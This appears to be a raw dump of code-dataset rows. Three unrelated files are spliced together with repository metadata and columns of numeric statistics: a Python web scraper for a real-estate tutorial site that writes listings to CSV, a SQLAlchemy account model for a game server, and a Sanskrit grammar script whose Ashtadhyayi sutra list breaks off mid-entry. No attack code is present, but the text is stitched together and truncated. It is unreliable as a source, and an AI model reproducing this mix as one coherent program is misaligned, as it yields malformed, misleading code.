| 44.222222 | 69 | 0.829146 | 54 | 398 | 5.888889 | 0.222222 | 0.301887 | 0.377358 | 0.471698 | 0.930818 | 0.930818 | 0.930818 | 0.666667 | 0 | 0 | 0 | 0.03125 | 0.035176 | 398 | 8 | 70 | 49.75 | 0.796875 | 0.180905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2113bf3861e3a27ad3188c3513d1b29be47a27b5 | 5,015 | py | Python | cent21.py | shadowp2810/python_WebScraper_cent21RealEstate | 186e663fbf8a333433b1d64731431c91aa59589c | [
"MIT"
] | null | null | null | cent21.py | shadowp2810/python_WebScraper_cent21RealEstate | 186e663fbf8a333433b1d64731431c91aa59589c | [
"MIT"
] | null | null | null | cent21.py | shadowp2810/python_WebScraper_cent21RealEstate | 186e663fbf8a333433b1d64731431c91aa59589c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[121]:
import requests
from bs4 import BeautifulSoup
r = requests.get(
"http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/" ,
headers = {
'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0' } )
c = r.content
soup = BeautifulSoup( c , "html.parser" )
# print( soup.prettify() )
all = soup.find_all(
"div" ,
{ "class" : "propertyRow" } )
# all # len( all ) # all[ 0 ]
all[ 0 ].find(
"h4" ,
{ "class" : "propPrice" } ).text.replace(
"\n" , "" ).replace( " " , "" )
# In[122]:
l = [] #list to store dictionaries of items
for item in all:
d = {} #dictionary to store all items
d[ "Price" ] = item.find( "h4" ,
{ "class" , "propPrice" } ).text.replace(
"\n" , "" ).replace( " " , "" )
d[ "Address" ] = item.find_all( "span" ,
{ "class" , "propAddressCollapse" } )[0].text
d[ "Locality" ] = item.find_all( "span" ,
{ "class" , "propAddressCollapse" } )[1].text
try:
d[ "Beds" ] = item.find( "span" ,
{ "class" , "infoBed"} ).find( "b" ).text
except:
d[ "Beds" ] = None
try:
d[ "Area" ] = item.find( "span" ,
{ "class" : "infoSqFt"} ).find( "b" ).text
except:
d[ "Area" ] = None
try:
d[ "Full Bath" ] = item.find( "span" ,
{ "class" : "infoValueFullBath"} ).find( "b" ).text
except:
d[ "Full Bath" ] = None
try:
d[ "Half Bath" ] = item.find( "span" ,
{ "class" : "infoValueHalfBath"} ).find( "b" ).text
except:
d[ "Half Bath" ] = None
for column_group in item.find_all(
"div" , { "class" : "columnGroup" } ) :
# print( column_group )
for feature_group , feature_name in zip(
column_group.find_all( "span" ,
{ "class" : "featureGroup" } ) ,
column_group.find_all( "span" ,
{ "class" : "featureName" } ) ) :
if "Lot Size" in feature_group.text :
d[ "Lot Size" ] = feature_name.text
l.append( d )
l
# In[123]:
import pandas
df = pandas.DataFrame( l )
df
# In[124]:
df.to_csv( "Output.csv" )
# In[130]:
l_allPages = [] #list to store dictionaries of items
final_page_nbr = soup.find_all(
"a" ,
{ "class" : "Page" } )[-1].text
base_url = "http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/t=0&s="
for page in range( 0 , int( final_page_nbr ) * 10 , 10 ) :
print( base_url + str( page ) + ".html" )
r = requests.get(
( base_url + str( page ) + ".html" ) ,
headers = {
'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0' } )
c = r.content
soup = BeautifulSoup( c , "html.parser" )
# print( soup.prettify() )
all = soup.find_all(
"div" ,
{ "class" : "propertyRow" } )
for item in all:
d = {} #dictionary to store all items
d[ "Price" ] = item.find( "h4" ,
{ "class" , "propPrice" } ).text.replace(
"\n" , "" ).replace( " " , "" )
d[ "Address" ] = item.find_all( "span" ,
{ "class" , "propAddressCollapse" } )[0].text
try:
d[ "Locality" ] = item.find_all( "span" ,
{ "class" , "propAddressCollapse" } )[1].text
except:
d[ "Locality" ] = None
try:
d[ "Beds" ] = item.find( "span" ,
{ "class" , "infoBed"} ).find( "b" ).text
except:
d[ "Beds" ] = None
try:
d[ "Area" ] = item.find( "span" ,
{ "class" : "infoSqFt"} ).find( "b" ).text
except:
d[ "Area" ] = None
try:
d[ "Full Bath" ] = item.find( "span" ,
{ "class" : "infoValueFullBath"} ).find( "b" ).text
except:
d[ "Full Bath" ] = None
try:
d[ "Half Bath" ] = item.find( "span" ,
{ "class" : "infoValueHalfBath"} ).find( "b" ).text
except:
d[ "Half Bath" ] = None
for column_group in item.find_all(
"div" , { "class" : "columnGroup" } ) :
# print( column_group )
for feature_group , feature_name in zip(
column_group.find_all( "span" ,
{ "class" : "featureGroup" } ) ,
column_group.find_all( "span" ,
{ "class" : "featureName" } ) ) :
if "Lot Size" in feature_group.text :
d[ "Lot Size" ] = feature_name.text
l_allPages.append( d )
l_allPages
# In[131]:
import pandas
df = pandas.DataFrame( l_allPages )
df
# In[132]:
df.to_csv( "Output_allPages.csv" )
| 24.950249 | 109 | 0.470588 | 540 | 5,015 | 4.287037 | 0.233333 | 0.055292 | 0.042765 | 0.055292 | 0.851404 | 0.835853 | 0.784017 | 0.784017 | 0.767171 | 0.767171 | 0 | 0.025994 | 0.36331 | 5,015 | 200 | 110 | 25.075 | 0.699029 | 0.069591 | 0 | 0.804878 | 0 | 0.02439 | 0.230786 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03252 | 0 | 0.03252 | 0.00813 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2126f74663032c5a5941bab4aca0447914b4be98 | 6,964 | py | Python | dash/data/penguin.py | klabacher/dash | e8eeee80e7deef07bcc139c212947c916543898f | [
"MIT"
] | null | null | null | dash/data/penguin.py | klabacher/dash | e8eeee80e7deef07bcc139c212947c916543898f | [
"MIT"
] | null | null | null | dash/data/penguin.py | klabacher/dash | e8eeee80e7deef07bcc139c212947c916543898f | [
"MIT"
] | null | null | null | from dash.data import db
class Penguin(db.Model):
__tablename__ = 'penguin'
id = db.Column(db.Integer, primary_key=True, server_default=db.text("nextval('\"penguin_id_seq\"'::regclass)"))
username = db.Column(db.String(12), nullable=False, unique=True)
nickname = db.Column(db.String(30), nullable=False)
password = db.Column(db.CHAR(60), nullable=False)
email = db.Column(db.String(255), nullable=False, index=True)
registration_date = db.Column(db.DateTime, nullable=False, server_default=db.text("now()"))
active = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
safe_chat = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
last_paycheck = db.Column(db.DateTime, nullable=False, server_default=db.text("now()"))
minutes_played = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
moderator = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
stealth_moderator = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
character = db.Column(db.ForeignKey('character.id', ondelete='CASCADE', onupdate='CASCADE'))
igloo = db.Column(db.ForeignKey('penguin_igloo_room.id', ondelete='CASCADE', onupdate='CASCADE'))
coins = db.Column(db.Integer, nullable=False, server_default=db.text("500"))
color = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
head = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
face = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
neck = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
body = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
hand = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
feet = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
photo = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
flag = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
permaban = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
book_modified = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
book_color = db.Column(db.SmallInteger, nullable=False, server_default=db.text("1"))
book_highlight = db.Column(db.SmallInteger, nullable=False, server_default=db.text("1"))
book_pattern = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
book_icon = db.Column(db.SmallInteger, nullable=False, server_default=db.text("1"))
agent_status = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
field_op_status = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
career_medals = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
agent_medals = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
last_field_op = db.Column(db.DateTime, nullable=False, server_default=db.text("now()"))
com_message_read_date = db.Column(db.DateTime, nullable=False, server_default=db.text("now()"))
ninja_rank = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
ninja_progress = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
fire_ninja_rank = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
fire_ninja_progress = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
water_ninja_rank = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
water_ninja_progress = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
ninja_matches_won = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
fire_matches_won = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
water_matches_won = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
rainbow_adoptability = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
has_dug = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
puffle_handler = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
nuggets = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
walking = db.Column(db.ForeignKey('penguin_puffle.id', ondelete='CASCADE', onupdate='CASCADE'))
opened_playercard = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
special_wave = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
special_dance = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
special_snowball = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
map_category = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
status_field = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
timer_active = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
timer_start = db.Column(db.Time, nullable=False, server_default=db.text("'00:00:00'::time without time zone"))
timer_end = db.Column(db.Time, nullable=False, server_default=db.text("'23:59:59'::time without time zone"))
timer_total = db.Column(db.Interval, nullable=False, server_default=db.text("'01:00:00'::interval"))
grounded = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_en = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_pt = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_fr = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_es = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_de = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_ru = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_en = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_pt = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_fr = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_es = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_de = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_ru = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
class ActivationKey(db.Model):
__tablename__ = 'activation_key'
penguin_id = db.Column(db.ForeignKey('penguin.id', ondelete='CASCADE', onupdate='CASCADE'), primary_key=True,
nullable=False)
activation_key = db.Column(db.CHAR(255), primary_key=True, nullable=False)
| 79.136364 | 115 | 0.730902 | 983 | 6,964 | 5.038657 | 0.134283 | 0.121139 | 0.151423 | 0.218655 | 0.83727 | 0.768827 | 0.762366 | 0.762366 | 0.760549 | 0.760549 | 0 | 0.008671 | 0.105686 | 6,964 | 87 | 116 | 80.045977 | 0.786609 | 0 | 0 | 0 | 0 | 0 | 0.088311 | 0.003016 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.012346 | 0.012346 | 0 | 0.987654 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
212ca0e136dbb1fa89e55f7c25909878647d9226 | 126,185 | py | Python | issues/issue2.py | lalitaalaalitah/siddhantakaumudi | cfd071f085caed300946c757781f4751a5c8dfe2 | [
"MIT"
] | 13 | 2017-01-02T00:55:15.000Z | 2021-08-13T16:29:34.000Z | issues/issue2.py | kmadathil/siddhantakaumudi | 105b3ca1595527c3d5e67d52213de7c5e9dffca7 | [
"MIT"
] | 70 | 2017-01-15T11:14:31.000Z | 2021-01-15T21:45:35.000Z | issues/issue2.py | kmadathil/siddhantakaumudi | 105b3ca1595527c3d5e67d52213de7c5e9dffca7 | [
"MIT"
] | 4 | 2017-01-31T06:20:35.000Z | 2020-03-25T07:41:38.000Z | # This Python file uses the following encoding: utf-8
"""
Usage:
python issue2.py
"""
import re,codecs,sys
import lxml
sys.path.insert(0,'..')
import transcoder
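# Each ASdata entry below packs "adhyaya.pada.sutra : category : sutra text"
# into a single colon-separated string (the category field may be empty).
# A minimal parsing sketch -- split_sutra is a hypothetical helper, not part
# of the original script:
def split_sutra(entry):
    """Split an ASdata entry into (number, category, text)."""
    number, category, text = entry.split(":", 2)
    return number, category, text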
# Data adapted from function.php of the SanskritVerb repository.
ASdata=["1.1.1:संज्ञा:वृद्धिरादैच्","1.1.2:संज्ञा:अदेङ् गुणः","1.1.3:परिभाषा:इको गुणवृद्धी","1.1.4::न धातुलोप आर्धधातुके","1.1.5::ग्क्ङिति च","1.1.6::दीधीवेवीटाम्","1.1.7:संज्ञा:हलोऽनन्तराः संयोगः","1.1.8:संज्ञा:मुखनासिकावचनोऽनुनासिकः","1.1.9:संज्ञा:तुल्यास्यप्रयत्नं सवर्णम्","1.1.10:संज्ञा:नाज्झलौ","1.1.11:संज्ञा:ईदूदेद्द्विवचनं प्रगृह्यम्","1.1.12:संज्ञा:अदसो मात्","1.1.13:संज्ञा:शे","1.1.14:संज्ञा:निपात एकाजनाङ्","1.1.15:संज्ञा:ओत्","1.1.16:संज्ञा:सम्बुद्धौ शाकल्यस्येतावनार्षे","1.1.17:संज्ञा:उञः","1.1.18:संज्ञा:ऊँ","1.1.19:संज्ञा:ईदूतौ च सप्तम्यर्थे","1.1.20:संज्ञा:दाधा घ्वदाप्","1.1.21:परिभाषा:आद्यन्तवदेकस्मिन्","1.1.22:संज्ञा:तरप्तमपौ घः","1.1.23:संज्ञा:बहुगणवतुडति संख्या","1.1.24:संज्ञा:ष्णान्ता षट्","1.1.25:संज्ञा:डति च","1.1.26:संज्ञा:क्तक्तवतू निष्ठा","1.1.27:संज्ञा:सर्वादीनि सर्वनामानि","1.1.28:संज्ञा:विभाषा दिक्समासे बहुव्रीहौ","1.1.29:संज्ञा:न बहुव्रीहौ","1.1.30:संज्ञा:तृतीयासमासे","1.1.31:संज्ञा:द्वन्द्वे च","1.1.32:संज्ञा:विभाषा जसि","1.1.33:संज्ञा:प्रथमचरमतयाल्पार्धकतिपयनेमाश्च","1.1.34:संज्ञा:पूर्वपरावरदक्षिणोत्तरापराधराणि","1.1.35:संज्ञा:स्वमज्ञातिधनाख्यायाम्","1.1.36:संज्ञा:अन्तरं बहिर्योगोपसंव्यानयोः","1.1.37:संज्ञा:स्वरादिनिपातमव्ययम्","1.1.38:संज्ञा:तद्धितश्चासर्वविभक्तिः","1.1.39:संज्ञा:कृन्मेजन्तः","1.1.40:संज्ञा:क्त्वातोसुन्कसुनः","1.1.41:संज्ञा:अव्ययीभावश्च","1.1.42:संज्ञा:शि सर्वनामस्थानम्","1.1.43:संज्ञा:सुडनपुंसकस्य","1.1.44:संज्ञा:न वेति विभाषा","1.1.45:संज्ञा:इग्यणः सम्प्रसारणम्","1.1.46:परिभाषा:आद्यन्तौ टकितौ","1.1.47:परिभाषा:मिदचोऽन्त्यात्परः","1.1.48:परिभाषा:एच इग्घ्रस्वादेशे","1.1.49:परिभाषा:षष्ठी स्थानेयोगा","1.1.50:परिभाषा:स्थानेऽन्तरतमः","1.1.51:परिभाषा:उरण् रपरः","1.1.52:परिभाषा:अलोऽन्त्यस्य","1.1.53:परिभाषा:ङिच्च","1.1.54:परिभाषा:आदेः परस्य","1.1.55:परिभाषा:अनेकाल्शित्सर्वस्य","1.1.56:अतिदेशः:स्थानिवदादेशोऽनल्विधौ","1.1.57:अतिदेशः:अचः परस्मिन् पूर्वविधौ","1.1.58:अतिदेशः:न पदान्तद्विर्वचनवरेयलोपस्वरसवर्णानुस्वारदीर्घजश्चर्विधिषु","1.1.59:अतिदेशः:द्विर्वचनेऽचि","1.1.60:संज्ञा:अदर्शनं लोपः","1.1.61:संज्ञा:प्रत्ययस्य लुक्श्लुलुपः","1.1.62:परिभाषा:प्रत्ययलोपे प्रत्ययलक्षणम्","1.1.63:परिभाषा:न लुमताऽङ्गस्य","1.1.64:संज्ञा:अचोऽन्त्यादि टि","1.1.65:संज्ञा:अलोऽन्त्यात् पूर्व उपधा","1.1.66:परिभाषा:तस्मिन्निति निर्दिष्टे पूर्वस्य","1.1.67:परिभाषा:तस्मादित्युत्तरस्य","1.1.68::स्वं रूपं शब्दस्याशब्दसंज्ञा","1.1.69::अणुदित् सवर्णस्य चाप्रत्ययः","1.1.70::तपरस्तत्कालस्य","1.1.71:संज्ञा:आदिरन्त्येन सहेता","1.1.72:संज्ञा:येन विधिस्तदन्तस्य","1.1.73:संज्ञा:वृद्धिर्यस्याचामादिस्तद् वृद्धम्","1.1.74:संज्ञा:त्यदादीनि च","1.1.75:संज्ञा:एङ् प्राचां देशे","1.2.1:अतिदेशः:गाङ्कुटादिभ्योऽञ्णिन्ङ् इत्","1.2.2:अतिदेशः:विज इट्","1.2.3:अतिदेशः:विभाषोर्णोः","1.2.4:अतिदेशः:सार्वधातुकमपित्","1.2.5:अतिदेशः:असंयोगाल्लिट् कित्","1.2.6:अतिदेशः:ईन्धिभवतिभ्यां च","1.2.7:अतिदेशः:मृडमृदगुधकुषक्लिशवदवसः क्त्वा","1.2.8:अतिदेशः:रुदविदमुषग्रहिस्वपिप्रच्छः सँश्च","1.2.9:अतिदेशः:इको झल्","1.2.10:अतिदेशः:हलन्ताच्च","1.2.11:अतिदेशः:लिङ्सिचावात्मनेपदेषु","1.2.12:अतिदेशः:उश्च","1.2.13:अतिदेशः:वा गमः","1.2.14:अतिदेशः:हनः सिच्","1.2.15:अतिदेशः:यमो गन्धने","1.2.16:अतिदेशः:विभाषोपयमने","1.2.17:अतिदेशः:स्था घ्वोरिच्च","1.2.18:अतिदेशः:न क्त्वा सेट्","1.2.19:अतिदेशः:निष्ठा शीङ्स्विदिमिदिक्ष्विदिधृषः","1.2.20:अतिदेशः:मृषस्तितिक्षायाम्","1.2.21:अतिदेशः:उदुपधाद्भावादिकर्मणोरन्यतरस्याम्","1.2.22:अतिदेशः:पूङः क्त्वा च","1.2.23:अतिदेशः:नोपधात्थफान्ताद्वा","1.2.24:अतिदेशः:वञ्चिलुञ्च्यृतश्च","1.2.25:अतिदेशः:तृषिमृषिकृशेः काश्यपस्य","1.2.26:अतिदेशः:रलो व्युपधाद्धलादेः 
संश्च","1.2.27:संज्ञा:ऊकालोऽज्झ्रस्वदीर्घप्लुतः","1.2.28:परिभाषा:अचश्च","1.2.29:संज्ञा:उच्चैरुदात्तः","1.2.30:संज्ञा:नीचैरनुदात्तः","1.2.31:संज्ञा:समाहारः स्वरितः","1.2.32::तस्यादित उदात्तमर्धह्रस्वम्","1.2.33::एकश्रुति दूरात् सम्बुद्धौ","1.2.34::यज्ञकर्मण्यजपन्यूङ्खसामसु","1.2.35::उच्चैस्तरां वा वषट्कारः","1.2.36::विभाषा छन्दसि","1.2.37::न सुब्रह्मण्यायां स्वरितस्य तूदात्तः","1.2.38::देवब्रह्मणोरनुदात्तः","1.2.39::स्वरितात् संहितायामनुदात्तानाम्","1.2.40::उदात्तस्वरितपरस्य सन्नतरः","1.2.41:संज्ञा:अपृक्त एकाल् प्रत्ययः","1.2.42:संज्ञा:तत्पुरुषः समानाधिकरणः कर्मधारयः","1.2.43:संज्ञा:प्रथमानिर्दिष्टं समास उपसर्जनम्","1.2.44:संज्ञा:एकविभक्ति चापूर्वनिपाते","1.2.45:संज्ञा:अर्थवदधातुरप्रत्ययः प्रातिपदिकम्","1.2.46:संज्ञा:कृत्तद्धितसमासाश्च","1.2.47::ह्रस्वो नपुंसके प्रातिपदिकस्य","1.2.48::गोस्त्रियोरुपसर्ज्जनस्य","1.2.49::लुक् तद्धितलुकि","1.2.50::इद्गोण्याः","1.2.51:अतिदेशः:लुपि युक्तवद्व्यक्तिवचने","1.2.52:अतिदेशः:विशेषणानां चाजातेः","1.2.53::तदशिष्यं संज्ञाप्रमाणत्वात्","1.2.54::लुब्योगाप्रख्यानात्","1.2.55::योगप्रमाणे च तदभावेऽदर्शनं स्यात्","1.2.56::प्रधानप्रत्ययार्थवचनमर्थस्यान्यप्रमाणत्वात्","1.2.57::कालोपसर्जने च तुल्यम्","1.2.58::जात्याख्यायामेकस्मिन् बहुवचनमन्यतरस्याम्","1.2.59::अस्मदो द्वायोश्च","1.2.60::फल्गुनीप्रोष्ठपदानां च नक्षत्रे","1.2.61::छन्दसि पुनर्वस्वोरेकवचनम्","1.2.62::विशाखयोश्च","1.2.63::तिष्यपुनर्वस्वोर्नक्षत्रद्वंद्वे बहुवचनस्य","1.2.64::सरूपाणामेकशेष एकविभक्तौ","1.2.65::वृद्धो यूना तल्लक्षणश्चेदेव विशेषः","1.2.66:अतिदेशः:स्त्री पुंवच्च","1.2.67::पुमान् स्त्रिया","1.2.68::भ्रातृपुत्रौ स्वसृदुहितृभ्याम्","1.2.69::नपुंसकमनपुंसकेनैकवच्चास्यान्यतरस्याम्","1.2.70::पिता मात्रा","1.2.71::श्वशुरः श्वश्र्वा","1.2.72::त्यदादीनि सर्वैर्नित्यम्","1.2.73::ग्राम्यपशुसंघेषु अतरुणेषु स्त्री","1.3.1:संज्ञा:भूवादयो धातवः","1.3.2:संज्ञा:उपदेशेऽजनुनासिक इत्","1.3.3:संज्ञा:हलन्त्यम्","1.3.4:संज्ञा:न विभक्तौ तुस्माः","1.3.5:संज्ञा:आदिर्ञिटुडवः","1.3.6:संज्ञा:षः प्रत्ययस्य","1.3.7:संज्ञा:चुटू","1.3.8:संज्ञा:लशक्वतद्धिते","1.3.9:संज्ञा:तस्य लोपः","1.3.10:परिभाषा:यथासंख्यमनुदेशः समानाम्","1.3.11:परिभाषा:स्वरितेनाधिकारः","1.3.12::अनुदात्तङित आत्मनेपदम्","1.3.13::भावकर्म्मणोः","1.3.14::कर्त्तरि कर्म्मव्यतिहारे","1.3.15::न गतिहिंसार्थेभ्यः","1.3.16::इतरेतरान्योन्योपपदाच्च","1.3.17::नेर्विशः","1.3.18::परिव्यवेभ्यः क्रियः","1.3.19::विपराभ्यां जेः","1.3.20::आङो दोऽनास्यविहरणे","1.3.21::क्रीडोऽनुसम्परिभ्यश्च","1.3.22::समवप्रविभ्यः स्थः","1.3.23::प्रकाशनस्थेयाख्ययोश्च","1.3.24::उदोऽनूर्द्ध्वकर्मणि","1.3.25::उपान्मन्त्रकरणे","1.3.26::अकर्मकाच्च","1.3.27::उद्विभ्यां तपः","1.3.28::आङो यमहनः","1.3.29::समो गम्यृच्छिप्रच्छिस्वरत्यर्तिश्रुविदिभ्यः","1.3.30::निसमुपविभ्यो ह्वः","1.3.31::स्पर्द्धायामाङः","1.3.32::गन्धनावक्षेपणसेवनसाहसिक्यप्रतियत्नप्रकथनोपयोगेषु कृञः","1.3.33::अधेः प्रसहने","1.3.34::वेः शब्दकर्म्मणः","1.3.35::अकर्मकाच्च","1.3.36::सम्माननोत्सञ्जनाचार्यकरणज्ञानभृतिविगणनव्ययेषु नियः","1.3.37::कर्तृस्थे चाशरीरे कर्मणि","1.3.38::वृत्तिसर्गतायनेषु क्रमः","1.3.39::उपपराभ्याम्","1.3.40::आङ उद्गमने","1.3.41::वेः पादविहरणे","1.3.42::प्रोपाभ्यां समर्थाभ्याम्","1.3.43::अनुपसर्गाद्वा","1.3.44::अपह्नवे ज्ञः","1.3.45::अकर्मकाच्च","1.3.46::सम्प्रतिभ्यामनाध्याने","1.3.47::भासनोपसम्भाषाज्ञानयत्नविमत्युपमन्त्रणेषु वदः","1.3.48::व्यक्तवाचां समुच्चारणे","1.3.49::अनोरकर्मकात्","1.3.50::विभाषा विप्रलापे","1.3.51::अवाद्ग्रः","1.3.52::समः प्रतिज्ञाने","1.3.53::उदश्चरः सकर्मकात्","1.3.54::समस्तृतीयायुक्तात्","1.3.55::दाणश्च सा चेच्चतुर्थ्यर्थे","1.3.56::उपाद्यमः स्वकरणे","1.3.57::ज्ञाश्रुस्मृदृशां सनः","1.3.58::नानोर्ज्ञः","1.3.59::प्रत्याङ्भ्यां श्रुवः","1.3.60::शदेः 
शितः","1.3.61::म्रियतेर्लुङ्लिङोश्च","1.3.62:अतिदेशः:पूर्ववत् सनः","1.3.63:अतिदेशः:आम्प्रत्ययवत् कृञोऽनुप्रयोगस्य","1.3.64::प्रोपाभ्यां युजेरयज्ञपात्रेषु","1.3.65::समः क्ष्णुवः","1.3.66::भुजोऽनवने","1.3.67::णेरणौ यत् कर्म णौ चेत् स कर्ताऽनाध्याने","1.3.68::भीस्म्योर्हेतुभये","1.3.69::गृधिवञ्च्योः प्रलम्भने","1.3.70::लियः सम्माननशालिनीकरणयोश्च","1.3.71::मिथ्योपपदात् कृञोऽभ्यासे","1.3.72::स्वरितञितः कर्त्रभिप्राये क्रियाफले","1.3.73::अपाद्वदः","1.3.74::णिचश्च","1.3.75::समुदाङ्भ्यो यमोऽग्रन्थे","1.3.76::अनुपसर्गाज्ज्ञः","1.3.77::विभाषोपपदेन प्रतीयमाने","1.3.78::शेषात् कर्तरि परस्मैपदम्","1.3.79::अनुपराभ्यां कृञः","1.3.80::अभिप्रत्यतिभ्यः क्षिपः","1.3.81::प्राद्वहः","1.3.82::परेर्मृषः","1.3.83::व्याङ्परिभ्यो रमः","1.3.84::उपाच्च","1.3.85::विभाषाऽकर्मकात्","1.3.86::बुधयुधनशजनेङ्प्रुद्रुस्रुभ्यो णेः","1.3.87::निगरणचलनार्थेभ्यः","1.3.88::अणावकर्मकाच्चित्तवत्कर्तृकात्","1.3.89::न पादम्याङ्यमाङ्यसपरिमुहरुचिनृतिवदवसः","1.3.90::वा क्यषः","1.3.91::द्युद्भ्यो लुङि","1.3.92::वृद्भ्यः स्यसनोः","1.3.93::लुटि च कॢपः","1.4.1:अधिकारः:आ कडारादेका संज्ञा","1.4.2:परिभाषा:विप्रतिषेधे परं कार्यम्","1.4.3:संज्ञा:यू स्त्र्याख्यौ नदी","1.4.4:संज्ञा:नेयङुवङ्स्थानावस्त्री","1.4.5:संज्ञा:वाऽऽमि","1.4.6:संज्ञा:ङिति ह्रस्वश्च","1.4.7:संज्ञा:शेषो घ्यसखि","1.4.8:संज्ञा:पतिः समास एव","1.4.9:संज्ञा:षष्ठीयुक्तश्छन्दसि वा","1.4.10:संज्ञा:ह्रस्वं लघु","1.4.11:संज्ञा:संयोगे गुरु","1.4.12:संज्ञा:दीर्घं च","1.4.13:संज्ञा:यस्मात् प्रत्ययविधिस्तदादि प्रत्ययेऽङ्गम्","1.4.14:संज्ञा:सुप्तिङन्तं पदम्","1.4.15:संज्ञा:नः क्ये","1.4.16:संज्ञा:सिति च","1.4.17:संज्ञा:स्वादिष्वसर्वनामस्थाने","1.4.18:संज्ञा:यचि भम्","1.4.19:संज्ञा:तसौ मत्वर्थे","1.4.20:संज्ञा:अयस्मयादीनि च्छन्दसि","1.4.21::बहुषु बहुवचनम्","1.4.22::द्व्येकयोर्द्विवचनैकवचने","1.4.23:संज्ञा; अधिकारः:कारके","1.4.24:संज्ञा:ध्रुवमपायेऽपादानम्","1.4.25:संज्ञा:भीत्रार्थानां भयहेतुः","1.4.26:संज्ञा:पराजेरसोढः","1.4.27:संज्ञा:वारणार्थानां ईप्सितः","1.4.28:संज्ञा:अन्तर्द्धौ येनादर्शनमिच्छति","1.4.29:संज्ञा:आख्यातोपयोगे","1.4.30:संज्ञा:जनिकर्तुः प्रकृतिः","1.4.31:संज्ञा:भुवः प्रभवः","1.4.32:संज्ञा:कर्मणा यमभिप्रैति स सम्प्रदानम्","1.4.33:संज्ञा:रुच्यर्थानां प्रीयमाणः","1.4.34:संज्ञा:श्लाघह्नुङ्स्थाशपां 